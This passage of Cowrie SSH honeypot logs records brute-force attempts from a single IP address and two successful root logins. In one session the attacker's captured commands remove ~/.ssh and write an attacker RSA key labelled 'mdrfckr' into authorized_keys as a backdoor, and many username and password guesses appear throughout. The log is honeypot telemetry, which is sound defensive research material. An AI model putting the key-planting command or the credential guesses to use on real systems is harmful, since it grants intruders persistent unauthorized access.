nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:48:12.855300Z","src_ip":"212.227.235.229","session":"1a708f39a0fc"}
{"eventid":"cowrie.login.failed","username":"sapach","password":"sapach","message":"login attempt [sapach/sapach] failed","sensor":"my-vps","timestamp":"2025-09-08T21:48:12.868886Z","src_ip":"212.227.235.229","session":"6b5b6a509426"}
{"eventid":"cowrie.login.failed","username":"media","password":"123456","message":"login attempt [media/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T21:48:13.707653Z","src_ip":"212.227.235.229","session":"1a708f39a0fc"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:48:14.048862Z","src_ip":"212.227.235.229","session":"6b5b6a509426"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:48:14.911969Z","src_ip":"212.227.235.229","session":"1a708f39a0fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52848,"dst_ip":"1.2.3.4","dst_port":22,"session":"aef9851119fd","protocol":"ssh","message":"New connection: 212.227.235.229:52848 (1.2.3.4:22) [session: aef9851119fd]","sensor":"my-vps","timestamp":"2025-09-08T21:48:38.102810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:48:38.103786Z","src_ip":"212.227.235.229","session":"aef9851119fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:48:38.428217Z","src_ip":"212.227.235.229","session":"aef9851119fd"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"12345","message":"login attempt [muhamad/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T21:48:39.768895Z","src_ip":"212.227.235.229","session":"aef9851119fd"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:48:41.097078Z","src_ip":"212.227.235.229","session":"aef9851119fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43638,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1d8a158d709","protocol":"ssh","message":"New connection: 212.227.235.229:43638 (1.2.3.4:22) [session: b1d8a158d709]","sensor":"my-vps","timestamp":"2025-09-08T21:48:47.868022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:48:47.868941Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:48:47.983718Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.login.success","username":"root","password":"plxx@#13915417585","message":"login attempt [root/plxx@#13915417585] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:48:48.486241Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:48:48.771910Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:48:48.772568Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:48:48.773387Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:48:48.889585Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:48:49.137038Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:48:49.137733Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:48:49.254577Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:48:49.255414Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43642,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fe8ca9d353d","protocol":"ssh","message":"New connection: 212.227.235.229:43642 (1.2.3.4:22) [session: 3fe8ca9d353d]","sensor":"my-vps","timestamp":"2025-09-08T21:48:49.366900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:48:49.367951Z","src_ip":"212.227.235.229","session":"3fe8ca9d353d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:48:49.481624Z","src_ip":"212.227.235.229","session":"3fe8ca9d353d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:48:49.977646Z","src_ip":"212.227.235.229","session":"3fe8ca9d353d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:48:51.093878Z","src_ip":"212.227.235.229","session":"3fe8ca9d353d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42240,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dc910db95fb","protocol":"ssh","message":"New connection: 212.227.235.229:42240 (1.2.3.4:22) [session: 3dc910db95fb]","sensor":"my-vps","timestamp":"2025-09-08T21:48:51.204236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:48:51.205096Z","src_ip":"212.227.235.229","session":"3dc910db95fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:48:51.315358Z","src_ip":"212.227.235.229","session":"3dc910db95fb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:48:51.800339Z","src_ip":"212.227.235.229","session":"3dc910db95fb"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:48:51.912123Z","src_ip":"212.227.235.229","session":"b1d8a158d709"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:48:51.912956Z","src_ip":"212.227.235.229","session":"3dc910db95fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55258,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3edd967fbd5","protocol":"ssh","message":"New connection: 212.227.235.229:55258 (1.2.3.4:22) [session: a3edd967fbd5]","sensor":"my-vps","timestamp":"2025-09-08T21:49:14.600345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:49:14.601671Z","src_ip":"212.227.235.229","session":"a3edd967fbd5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:49:14.894432Z","src_ip":"212.227.235.229","session":"a3edd967fbd5"}
{"eventid":"cowrie.login.failed","username":"webuser","password":"webuser.123","message":"login attempt [webuser/webuser.123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:49:16.107180Z","src_ip":"212.227.235.229","session":"a3edd967fbd5"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:49:17.403454Z","src_ip":"212.227.235.229","session":"a3edd967fbd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53596,"dst_ip":"1.2.3.4","dst_port":22,"session":"e76643dca24a","protocol":"ssh","message":"New connection: 212.227.235.229:53596 (1.2.3.4:22) [session: e76643dca24a]","sensor":"my-vps","timestamp":"2025-09-08T21:49:21.788164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:49:21.789493Z","src_ip":"212.227.235.229","session":"e76643dca24a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:49:22.099808Z","src_ip":"212.227.235.229","session":"e76643dca24a"}
{"eventid":"cowrie.login.failed","username":"app","password":"2025","message":"login attempt [app/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T21:49:23.380838Z","src_ip":"212.227.235.229","session":"e76643dca24a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:49:24.693551Z","src_ip":"212.227.235.229","session":"e76643dca24a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51158,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6c93f0b649b","protocol":"ssh","message":"New connection: 212.227.235.229:51158 (1.2.3.4:22) [session: f6c93f0b649b]","sensor":"my-vps","timestamp":"2025-09-08T21:49:40.941195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:49:40.942411Z","src_ip":"212.227.235.229","session":"f6c93f0b649b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:49:41.252967Z","src_ip":"212.227.235.229","session":"f6c93f0b649b"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123","message":"login attempt [developer/123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:49:42.535219Z","src_ip":"212.227.235.229","session":"f6c93f0b649b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:49:43.848726Z","src_ip":"212.227.235.229","session":"f6c93f0b649b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43706,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb890b05d7ea","protocol":"ssh","message":"New connection: 212.227.235.229:43706 (1.2.3.4:22) [session: fb890b05d7ea]","sensor":"my-vps","timestamp":"2025-09-08T21:50:13.022750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:50:13.023750Z","src_ip":"212.227.235.229","session":"fb890b05d7ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:50:13.204049Z","src_ip":"212.227.235.229","session":"fb890b05d7ea"}
{"eventid":"cowrie.login.failed","username":"test7","password":"test7","message":"login attempt [test7/test7] failed","sensor":"my-vps","timestamp":"2025-09-08T21:50:13.967988Z","src_ip":"212.227.235.229","session":"fb890b05d7ea"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:15.151170Z","src_ip":"212.227.235.229","session":"fb890b05d7ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42812,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7a89a7b5299","protocol":"ssh","message":"New connection: 212.227.235.229:42812 (1.2.3.4:22) [session: d7a89a7b5299]","sensor":"my-vps","timestamp":"2025-09-08T21:50:19.700944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:50:21.226338Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
